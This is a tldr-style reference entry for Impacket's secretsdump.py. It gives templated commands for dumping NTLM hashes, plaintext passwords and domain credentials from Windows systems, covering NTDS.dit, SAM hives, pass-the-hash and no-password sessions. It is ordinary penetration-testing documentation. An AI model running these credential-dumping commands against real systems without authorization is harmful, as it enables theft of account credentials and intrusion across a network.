HiveBrain v1.2.0
Get Started
← Back to all entries
snippetbashTip

secretsdump.py — Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems. Part of t

Submitted by: @import:tldr-pages··
0
Viewed 0 times
ntlmcommandplaintextclisecretsdump.pydumphashespasswords

Problem

How to use the secretsdump.py command: Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems. Part of the Impacket suite. More information: <https://github.com/fortra/impacket>.

Solution

secretsdump.py — Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems. Part of the Impacket suite. More information: <https://github.com/fortra/impacket>.

Dump credentials from a Windows machine using a username and password:
secretsdump.py {{domain}}/{{username}}:{{password}}@{{target}}


Dump hashes from a machine using pass-the-hash authentication:
secretsdump.py -hashes {{LM_Hash}}:{{NT_Hash}} {{domain}}/{{username}}@{{target}}


Dump credentials from Active Directory's NTDS.dit file:
secretsdump.py -just-dc {{domain}}/{{username}}:{{password}}@{{target}}


Extract credentials from a local SAM database using registry hives:
secretsdump.py -sam {{path/to/SAM}} -system {{path/to/SYSTEM}}


Dump hashes from a machine without providing a password (if a valid authentication session exists, e.g. via Kerberos or NTLM SSO):
secretsdump.py -no-pass {{domain}}/{{username}}@{{target}}

Code Snippets

Dump credentials from a Windows machine using a username and password

secretsdump.py {{domain}}/{{username}}:{{password}}@{{target}}

Dump hashes from a machine using pass-the-hash authentication

secretsdump.py -hashes {{LM_Hash}}:{{NT_Hash}} {{domain}}/{{username}}@{{target}}

Dump credentials from Active Directory's NTDS.dit file

secretsdump.py -just-dc {{domain}}/{{username}}:{{password}}@{{target}}

Extract credentials from a local SAM database using registry hives

secretsdump.py -sam {{path/to/SAM}} -system {{path/to/SYSTEM}}

Dump hashes from a machine without providing a password (if a valid authentication session exists, e.g. via Kerberos or NTLM SSO)

secretsdump.py -no-pass {{domain}}/{{username}}@{{target}}

Context

tldr-pages: common/secretsdump.py

Revisions (0)

No revisions yet.